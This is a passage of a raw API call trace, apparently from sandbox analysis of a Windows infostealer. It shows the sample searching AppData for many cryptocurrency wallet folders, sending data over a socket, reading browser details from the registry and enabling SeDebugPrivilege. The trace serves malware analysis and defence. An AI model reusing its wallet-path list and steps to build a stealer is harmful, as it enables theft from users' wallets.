0xffffffff [0222.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.169] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.169] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\atomic", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic") returned 0x2a [0222.169] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", lpFilePart=0x0) returned 0x29 [0222.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.169] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", lpFilePart=0x0) returned 0x29 [0222.170] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic\\*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.172] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.172] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Binance", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance") returned 0x2b [0222.172] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", lpFilePart=0x0) returned 0x2a [0222.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.172] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", lpFilePart=0x0) returned 0x2a [0222.173] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance\\*app-store*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.175] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.175] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Coinomi", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi") returned 0x2b [0222.175] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", lpFilePart=0x0) returned 0x2a [0222.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.175] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", lpFilePart=0x0) returned 0x2a [0222.175] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi\\*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.177] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.178] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Electrum\\wallets", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets") returned 0x34 [0222.178] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", lpFilePart=0x0) returned 0x33 [0222.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.178] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", lpFilePart=0x0) returned 0x33 [0222.178] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets\\*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.180] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.180] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Ethereum\\wallets", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets") returned 0x34 [0222.181] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", lpFilePart=0x0) returned 0x33 [0222.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.181] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", lpFilePart=0x0) returned 0x33 [0222.181] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets\\*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.183] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.183] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Exodus\\exodus.wallet", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet") returned 0x38 [0222.183] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", lpFilePart=0x0) returned 0x37 [0222.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.183] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", lpFilePart=0x0) returned 0x37 [0222.185] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet\\*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.185] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.187] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.187] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Exodus", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus") returned 0x2a [0222.187] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", lpFilePart=0x0) returned 0x29 [0222.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.187] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", lpFilePart=0x0) returned 0x29 [0222.187] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\*.json", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.190] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.190] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Guarda", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda") returned 0x2a [0222.190] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", lpFilePart=0x0) returned 0x29 [0222.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.190] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", lpFilePart=0x0) returned 0x29 [0222.190] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda\\*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.192] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0222.192] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\com.liberty.jaxx", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx") returned 0x34 [0222.192] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", lpFilePart=0x0) returned 0x33 [0222.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.192] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", lpFilePart=0x0) returned 0x33 [0222.193] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx\\*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.194] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0222.195] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents\\Monero\\wallets", lpDst=0x36f194, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets") returned 0x2c [0222.195] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", nBufferLength=0x105, lpBuffer=0x36edb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", lpFilePart=0x0) returned 0x2b [0222.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f288) returned 1 [0222.195] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", lpFilePart=0x0) returned 0x2b [0222.195] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets\\*", lpFindFileData=0x36f038 | out: lpFindFileData=0x36f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0222.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eff8) returned 1 [0222.251] CoCreateGuid (in: pguid=0x36efb4 | out: pguid=0x36efb4*(Data1=0xdbf7d894, Data2=0x4af5, Data3=0x48a5, Data4=([0]=0x93, [1]=0xf, [2]=0x50, [3]=0x27, [4]=0x16, [5]=0xd4, [6]=0x4, [7]=0x3e))) returned 0x0 [0222.251] CoCreateGuid (in: pguid=0x36eef8 | out: pguid=0x36eef8*(Data1=0x7f4ec2df, Data2=0xfdc0, Data3=0x47ec, Data4=([0]=0xbe, [1]=0x23, [2]=0xf0, [3]=0xa4, [4]=0x8f, [5]=0xc8, [6]=0xfb, [7]=0xe4))) returned 0x0 [0222.251] send (s=0x264, buf=0x3740137*, len=162, flags=0) returned 162 [0222.252] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 132 [0222.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b8 | out: phkResult=0x36f2b8*=0x250) returned 0x0 [0222.293] RegQueryInfoKeyW (in: hKey=0x250, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x36f2e0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x36f2dc, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x36f2e0*=0x1, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x36f2dc*=0x1, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0222.293] RegEnumKeyExW (in: hKey=0x250, dwIndex=0x0, lpName=0x26d186c, lpcchName=0x36f2fc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEXPLORE.EXE", lpcchName=0x36f2fc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0222.293] CoTaskMemFree (pv=0x0) [0222.293] RegOpenKeyExW (in: hKey=0x250, lpSubKey="IEXPLORE.EXE", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b8 | out: phkResult=0x36f2b8*=0x260) returned 0x0 [0222.293] RegQueryValueExW (in: hKey=0x260, lpValueName=0x0, lpReserved=0x0, lpType=0x36f2d8, lpData=0x0, lpcbData=0x36f2d4*=0x0 | out: lpType=0x36f2d8*=0x1, lpData=0x0, lpcbData=0x36f2d4*=0x24) returned 0x0 [0222.293] RegQueryValueExW (in: hKey=0x260, lpValueName=0x0, lpReserved=0x0, lpType=0x36f2d8, lpData=0x26d1b98, lpcbData=0x36f2d4*=0x24 | out: lpType=0x36f2d8*=0x1, lpData="Internet Explorer", lpcbData=0x36f2d4*=0x24) returned 0x0 [0222.294] RegOpenKeyExW (in: hKey=0x260, lpSubKey="shell\\open\\command", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b8 | out: phkResult=0x36f2b8*=0x354) returned 0x0 [0222.294] RegQueryValueExW (in: hKey=0x354, lpValueName=0x0, lpReserved=0x0, lpType=0x36f2d8, lpData=0x0, lpcbData=0x36f2d4*=0x0 | out: lpType=0x36f2d8*=0x1, lpData=0x0, lpcbData=0x36f2d4*=0x6c) returned 0x0 [0222.294] RegQueryValueExW (in: hKey=0x354, lpValueName=0x0, lpReserved=0x0, lpType=0x36f2d8, lpData=0x26d1d80, lpcbData=0x36f2d4*=0x6c | out: lpType=0x36f2d8*=0x1, lpData="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpcbData=0x36f2d4*=0x6c) returned 0x0 [0222.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpFilePart=0x0) returned 0x35 [0222.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36efcc) returned 1 [0222.294] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe"), fInfoLevelId=0x0, lpFileInformation=0x36f290 | out: lpFileInformation=0x36f290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2e87a7f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2e87a7f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2eadbdf, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa4510)) returned 1 [0222.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36efc8) returned 1 [0222.295] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpdwHandle=0x36f304 | out: lpdwHandle=0x36f304) returned 0xc0c [0222.516] GetFileVersionInfoW (in: lptstrFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", dwHandle=0x0, dwLen=0xc0c, lpData=0x26d1f58 | out: lpData=0x26d1f58) returned 1 [0222.521] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x36f2d8, puLen=0x36f2d4 | out: lplpBuffer=0x36f2d8*=0x26d2558, puLen=0x36f2d4) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x26d2010, puLen=0x36f254) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x26d2064, puLen=0x36f254) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x26d20a8, puLen=0x36f254) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x26d2118, puLen=0x36f254) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x26d2150, puLen=0x36f254) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x26d21d4, puLen=0x36f254) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x26d2218, puLen=0x36f254) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x26d2274, puLen=0x36f254) returned 1 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x0, puLen=0x36f254) returned 0 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x0, puLen=0x36f254) returned 0 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x0, puLen=0x36f254) returned 0 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x36f258, puLen=0x36f254 | out: lplpBuffer=0x36f258*=0x0, puLen=0x36f254) returned 0 [0222.523] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x36f24c, puLen=0x36f248 | out: lplpBuffer=0x36f24c*=0x26d2558, puLen=0x36f248) returned 1 [0222.524] VerLanguageNameW (in: wLang=0x409, szLang=0x36efdc, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0222.591] VerQueryValueW (in: pBlock=0x26d1f58, lpSubBlock="\\", lplpBuffer=0x36f25c, puLen=0x36f258 | out: lplpBuffer=0x36f25c*=0x26d1f80, puLen=0x36f258) returned 1 [0222.595] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0xc4fa30b0, Data2=0x9656, Data3=0x46cc, Data4=([0]=0xb3, [1]=0x85, [2]=0x5b, [3]=0x30, [4]=0xac, [5]=0x16, [6]=0xa7, [7]=0xbf))) returned 0x0 [0222.595] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0x781f432e, Data2=0x3291, Data3=0x47dd, Data4=([0]=0xa6, [1]=0x2e, [2]=0xd8, [3]=0x6f, [4]=0x41, [5]=0xdd, [6]=0xd8, [7]=0xd2))) returned 0x0 [0222.616] send (s=0x264, buf=0x3740137*, len=311, flags=0) returned 311 [0222.617] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 132 [0222.773] GetCurrentProcessId () returned 0xec4 [0222.776] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x36eb2c | out: lpLuid=0x36eb2c*(LowPart=0x14, HighPart=0)) returned 1 [0222.779] GetCurrentProcess () returned 0xffffffff [0222.780] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x36eb28 | out: TokenHandle=0x36eb28*=0x364) returned 1 [0222.781] AdjustTokenPrivileges (in: TokenHandle=0x364, DisableAllPrivileges=0, NewState=0x26d796c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0222.781] 